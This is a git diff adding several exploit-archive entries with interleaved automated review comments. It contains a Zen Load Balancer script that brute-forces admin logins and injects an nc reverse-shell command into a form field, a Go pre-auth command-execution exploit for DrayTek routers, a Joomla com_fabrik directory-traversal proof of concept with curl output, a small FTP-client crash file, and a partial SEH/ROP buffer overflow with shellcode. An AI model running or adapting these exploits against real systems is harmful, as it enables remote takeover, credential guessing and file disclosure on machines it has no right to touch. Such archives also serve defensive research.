diff --git a/exploits/cgi/webapps/48266.py b/exploits/cgi/webapps/48266.py
new file mode 100755
index 000000000..b8d533935
--- /dev/null
+++ b/exploits/cgi/webapps/48266.py
@@ -0,0 +1,110 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
+# Google Dork: no
+# Date: 2020-03-28
+# Exploit Author: Cody Sixteen
+# Vendor Homepage: https://code610.blogspot.com
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Linux
+# CVE : CVE-2019-7301
+
+#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
+#!/usr/bin/env python
+# zenload3r.py - zen load balancer pwn3r
+# 28.03.2020 @ 22:41
+#
+# by cody sixteen
+#
+
+import base64
+import sys, re
+import requests
+import ssl
+from functools import partial
+ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
+# disable ssl warnings:
+import urllib3
+urllib3.disable_warnings()
+from requests.auth import HTTPBasicAuth
+
+#
+target = sys.argv[1]
+username = 'admin'
+password = 'P@ssw0rd'
+
+def main():
+ print 'zenload3r.py - zen load balancer pwn3r'
+ print ' zenload3r.py - vs - %s' % ( target )
+ print ''
+
+ print '[+] checking if host is alive...'
+ global sess
+ sess = requests.session()
+ global baseUrl
+ baseUrl = target + ':444/index.cgi'
+ checkBaseUrl = sess.get(baseUrl, verify=False)
+ checkBaseResp = checkBaseUrl.status_code
+
+ #print checkBaseResp
+ if checkBaseResp == 401:
+ print '[i] ...it is. we need to log in to proceed'
+ logmein(baseUrl)
+
+
+def logmein(target):
+ print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)
+
+ #pwd_file = '/usr/share/wordlists/dirb/common.txt'
+ pwd_file = 'passwd.lst'
+
+ try:
+ read_pwds = open(pwd_file, 'r')
+ pwds = read_pwds.readlines()
+
+ for pwd in pwds:
+ pwd = pwd.rstrip()
+ logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
+ logmeresp = logme.text
+
+ #print logmeresp
+ if '

Hello admin' in logmeresp:
+ print '[+] admin user logged-in! :D'
+ print '[+] working password: %s' % ( pwd )
+
+ load3r(baseUrl, pwd)
+
+ except requests.exceptions.ConnectionError:
+ print '[-] Can not connect to remote host :C\n'
+
+
+def load3r(baseUrl, pwd):
+ print '[+] time to get reverse shell, preparing...'
+
+ creds = base64.b64encode("{}:{}".format(username,pwd))
+ creds2 = creds.rstrip()
+ print 'creds: ', creds2
+
+ baseUrl = "https://192.168.1.200:444/index.cgi"
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+ "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
+ "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444",
+ "Authorization": "Basic {}".format(creds2), "Connection": "close",
+ "Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1"
+ }
+ sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
+ reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel",
+ "cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe",
+ "cert_organization": sh,
+ "cert_locality": "qweqweqwe", "cert_state": "qweqweqwe",
+ "cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com",
+ "cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}
+
+ requests.post(baseUrl, headers=headers, data=reqdata,verify=False)
+
+ print '[*] got r00t? ;>\n'
+
+
+# run me:
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/linux/remote/48268.go b/exploits/linux/remote/48268.go
new file mode 100755
index 000000000..88ed03305
--- /dev/null
+++ b/exploits/linux/remote/48268.go
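Review bot: The `# Vendor Homepage: https://code610.blogspot.com` header line appears to point at the author's own blog rather than the Zen Load Balancer vendor's site, while the `# Software Link` goes to SourceForge; the header should carry the product vendor's page, e.g. `# Vendor Homepage: <vendor-site-url>` (placeholder). In `logmein`, `read_pwds = open(pwd_file, 'r')` is never closed, so the handle leaks on every path including the `ConnectionError` branch; `with open(pwd_file, 'r') as read_pwds:` around the `readlines()` call fixes that. The `print` statements and `base64.b64encode` applied to a `str` mean the script only runs under Python 2, which `# Tested on: Linux` does not convey; `# Tested on: Linux (Python 2)` would document the interpreter requirement.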
@@ -0,0 +1,87 @@
+package main
+
+
+/*
+CVE-2020-8515: DrayTek pre-auth remote root RCE
+Mon Mar 30 2020 - 0xsha.io
+Affected:
+DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
+and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
+and 1.4.4_Beta
+You should upgrade as soon as possible to 1.5.1 firmware or later
+This issue has been fixed in Vigor3900/2960/300B v1.5.1.
+read more :
+https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
+https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
+https://thehackernews.com/2020/03/draytek-network-hacking.html
+https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
+exploiting using keyPath
+POST /cgi-bin/mainfunction.cgi HTTP/1.1
+Host: 1.2.3.4
+Content-Length: 89
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
+ */
+
+import (
+ "fmt"
+ "io/ioutil"
+ "net/http"
+ "net/url"
+ "os"
+ "strings"
+)
+
+func usage() {
+
+ fmt.Println("CVE-2020-8515 exploit by @0xsha ")
+ fmt.Println("Usage : " + os.Args[0] + " URL " + "command" )
+ fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" )
+}
+
+func main() {
+
+
+ if len(os.Args) < 3 {
+ usage()
+ os.Exit(-1)
+ }
+
+ targetUrl := os.Args[1]
+ //cmd := "cat /etc/passwd"
+ cmd := os.Args[2]
+
+
+ // payload preparation
+ vulnerableFile := "/cgi-bin/mainfunction.cgi"
+ // specially crafted CMD
+ // action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
+ payload :=`'
+ /bin/sh -c 'CMD'
+ '`
+ payload = strings.ReplaceAll(payload,"CMD", cmd)
+ bypass := strings.ReplaceAll(payload," ", "${IFS}")
+
+ //PostForm call url encoder internally
+ resp, err := http.PostForm(targetUrl+vulnerableFile ,
+ url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"},
"loginPwd": {"a"} }) + + if err != nil{ + fmt.Println("error connecting host") + os.Exit(-1) + } + + + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + + if err != nil{ + fmt.Println("error reading data") + os.Exit(-1) + } + + fmt.Println(string(body)) + +} \ No newline at end of file diff --git a/exploits/php/webapps/48263.txt b/exploits/php/webapps/48263.txt new file mode 100644 index 000000000..826d6f5d6 --- /dev/null +++ b/exploits/php/webapps/48263.txt 
@@ -0,0 +1,65 @@
+# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal
+#Google Dork: inurl:"index.php?option=com_fabrik"
+#Date: 2020-03-30
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://fabrikar.com/
+#Software Link: https://fabrikar.com/downloads
+#Version: 3.9
+#Tested on: Debian/Nginx/Joomla! 3.9.11
+##################################################################
+#Vulnerability details
+##################################################################
+File: fabrik_element/image/image.php
+Func: onAjax_files
+
+ 394 public function onAjax_files()
+ 395 {
+ 396 $this->loadMeForAjax();
+ 397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal.
+ 398
+ 399 if (!strstr($folder, JPATH_SITE))
+ 400 {
+ 401 $folder = JPATH_SITE . '/' . $folder;
+ 402 }
+ 403
+ 404 $pathA = JPath::clean($folder);
+ 405 $folder = array();
+ 406 $files = array();
+ 407 $images = array();
+ 408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders);
+ 409
+ 410 if (!array_key_exists('/', $images))
+ 411 {
+ 412 $images['/'] = array();
+ 413 }
+ 414
+ 415 echo json_encode($images['/']);
+ 416 }
+##################################################################
+#PoC
+##################################################################
+$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/"
+
+...snip...
+[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}]
+...snip...
+
+$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"
+
+...snip...
+[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}] +...snip... 
+################################################################## +#Q&D Patch (DO NOT USE :3) +################################################################## +--- ./image.php --- ++++ image_patched.php --- +@@ -394,7 +394,7 @@ + public function onAjax_files() + { + $this->loadMeForAjax(); +- $folder = $this->app->input->get('folder', '', 'string'); ++ $folder = $this->app->input->get('folder', '', 'cmd'); + + if (!strstr($folder, JPATH_SITE)) + { \ No newline at end of file diff --git a/exploits/windows/dos/48262.py b/exploits/windows/dos/48262.py new file mode 100755 index 000000000..98179dd17 --- /dev/null +++ b/exploits/windows/dos/48262.py @@ -0,0 +1,25 @@ +# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC) +# Discovery by: Ivan Marmolejo +# Discovery Date: 2020-03-27 +# Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/ +# Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3 +# Version : Odin Secure FTP Expert 7.6.3 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Home Single Lenguage (ESP) + +Steps to Produce the Crash: + + 1.- Run python code: OdinSecureFTP.py + 2.- Copy content to clipboard + 3.- Open "OdinSecureFTPExpert.exe" + 4.- Go to "Trial" > Connect > Quickconnect site + 5.- Paste ClipBoard into the all fields + 6.- Go to Connect + 7.- Crashed + +Python "OdinSecureFTP" Code: + +buffer = "\x41" * 108 +f = open ("OdinSecureFTP.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48264.py b/exploits/windows/local/48264.py new file mode 100755 index 000000000..e6ad38b43 --- /dev/null +++ b/exploits/windows/local/48264.py 
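Review bot: The header's `#Version: 3.9` disagrees with both the title (`com_fabrik 3.9.11`) and `#Tested on: Debian/Nginx/Joomla! 3.9.11`; `#Version: 3.9.11` would state the release that was actually confirmed. The "Q&D Patch (DO NOT USE :3)" only swaps the input filter from `'string'` to `'cmd'`, and the advisory never says what the proper fix looks like; for anyone triaging this entry, the remediation is to resolve the path produced by `JPath::clean($folder)` and reject it unless it still lies under the intended base directory, because the `strstr($folder, JPATH_SITE)` test at line 399 only checks for a substring and cannot stop `../` segments from walking out of `JPATH_SITE`. A one-line remark to that effect under the patch heading would make the DO-NOT-USE warning actionable.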
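Review bot: The `Steps to Produce the Crash:` block and the `Python "OdinSecureFTP" Code:` line sit outside any comment, so the file as committed is not valid Python and fails at parse time before the four-line script at the bottom runs; prefixing those lines with `#`, matching the header block, keeps the reproduction notes and the script together in one parseable file. The `f = open ("OdinSecureFTP.txt", "w")` / `f.close()` pair would be clearer as `with open("OdinSecureFTP.txt", "w") as f:`, which also closes the handle if `write` raises. `Single Lenguage` in the `# Tested on OS:` line is a typo for `Language`.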
@@ -0,0 +1,141 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
+# Date: 2020-03-30
+# Exploit Author: Hodorsec
+# Version: 9.03
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Vendor Homepage: https://www.10-strike.com
+# Tested on: Win8.1 x64 - Build 9600
+
+# Description:
+# - Exploits the functionality to load a list of computers from a file
+# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP
+# - Used a jump after ROP to go to a buffer for more space
+
+# Reproduction:
+# - Run the script, a TXT file will be generated
+# - Open the program and click on tab "Computers"
+# - Click the button "From Text File" and select the generated TXT file
+# - Clck OK and check results
+
+# WinDBG initial crash output:
+# (f54.f48): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe
+# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
+# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy
+# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203
+# NetworkInventoryExplorer+0x2b47:
+# 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+# 0:000> g
+# (f54.f48): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
+# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc
+# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
+# 41414141 ?? ???
+ + +#!/usr/bin/python + +import sys, struct + +filename = "poc_10_strike_nie.txt" + +# Maximum length +maxlen = 5000 + +# Offsets +crash_esi = 2145 # Initial space until ESI buffer filling +crash_seh = 217 # SEH +crash_nseh = crash_seh - 4 # NSEH +landingpad = 310 # Space for RET NOP landingpad after stackpivoting + +# Shellcode +# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread +# Payload size: 220 bytes +shellcode = b"" +shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06" +shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14" +shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02" +shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb" +shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e" +shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b" +shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0" +shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5" +shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50" +shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94" +shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87" +shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce" +shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12" +shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf" +shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1" +shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9" +shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8" +shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82" +shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68" +shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f" + +# ROP chain +def create_rop_chain(): + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x7c344efe, # POP EDX # RETN [MSVCR71.dll] + 0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll] + 0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN 
[NetworkInventoryExplorer.exe] + 0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe] + 0x61e7555f, # POP EBP # RETN [sqlite3.dll] + 0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll] + 0x7c37678f, # POP EAX # RETN [MSVCR71.dll] + 0xfffffdff, # Value to negate, will become 0x00000201 + 0x7c34d749, # NEG EAX # RETN [MSVCR71.dll] + 0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe] + 0xffffffff, # + 0x61e0579d, # INC EBX # RETN [sqlite3.dll] + 0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe] + 0x7c3458e6, # POP EDX # RETN [MSVCR71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll] + 0x7c369c4a, # POP ECX # RETN [MSVCR71.dll] + 0x7c38dfd7, # &Writable location [MSVCR71.dll] + 0x7c34a40e, # POP EDI # RETN [MSVCR71.dll] + 0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe] + 0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe] + 0x90909090, # nop + 0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe] + ] + return ''.join(struct.pack('